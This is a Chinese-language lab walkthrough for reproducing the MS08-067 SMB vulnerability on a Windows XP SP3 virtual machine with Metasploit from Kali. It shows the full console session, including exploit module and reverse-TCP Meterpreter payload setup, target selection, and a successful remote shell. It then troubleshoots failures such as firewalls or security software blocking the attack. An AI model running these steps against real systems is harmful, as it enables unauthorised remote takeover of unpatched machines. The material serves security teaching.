ms08-067漏洞的复现及所遇到的问题分析

一、复现过程

靶机	Windows XP Service Pack 3	IP地址：192.168.244.133
攻击机	Kali	IP地址：192.168.244.138

1、执行命令：msfconsole

┌──(root㉿kali)-[~/桌面]
└─# msfconsole
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

2、执行命令：search ms08-067

msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

3、执行命令：use 0 或 use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

4、执行命令：show options

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.244.138  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

5、执行命令：show targets

msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)

6、执行命令：set  target  34 和 set  rhost  192.168.244.138

msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34

7、执行命令：set  rhost 192.168.244.133

msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.244.133
rhost => 192.168.244.133

8、执行命令：show options

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.244.133  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.244.138  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   34  Windows XP SP3 Chinese - Simplified (NX)

9、执行命令：exploit

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.244.138:4444 
[*] 192.168.244.133:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.244.133
[*] Meterpreter session 1 opened (192.168.244.138:4444 -> 192.168.244.133:1061 ) at 2022-10-06 20:36:00 +0800

8、执行命令：ipconfig 

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - 
Hardware MAC : 00:0c:29:31:24:dc
MTU          : 1500
IPv4 Address : 192.168.244.133
IPv4 Netmask : 255.255.255.0

二、遇到的问题

msf6 exploit(window/amb/nsto_067_notapi) > exploit
[*] Started reverse TCP handler on 192.168.43.75:135
[-] 192.168.244.133:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.
[*] Exploit completed, but no session was created.

msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.244.138:4444
[-] 192.168.244.144:445 - Exploit failed [unreachable]: Rex:: HostUnreachable The host (192.168.244.144:445) was unreachable.
[*] Exploit completed, but no session was created.

1、执行exploit命令后提示：Exploit failed [unreachable]: Rex:: HostUnreachable The host  was unreachable. 或 Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.

出现这两种问题的原因可能有以下三个：

（1）靶机的防火墙或杀毒未关或如火绒这类的安全软件未退出。

当已经确定防火墙关闭时，要去检查安全软件是否退出，因为火绒会进行拦截。

（2）靶机和攻击机不在一个网段内，不能互相ping通。

（3）靶机的端口没有打开，即RPORT中所对应的端口没有打开。

注：优先考虑前两个原因，当前两个原因检查之后确定无误时，再去检查端口的状态。

2、执行exploit命令后提示：Exploit completed, but no session was created.

 出现该问题的原因可能有以下两个：

（1）靶机版本不支持

        下载Windows XP SP3 English。

（2）未指定靶机的版本号，在执行show targets命令后，找到与自己靶机相对应版本的版本号，如Windows XP SP3 Chinese - Simplified (NX)的版本号为34，执行set target 34 为自己的靶机指定版本号。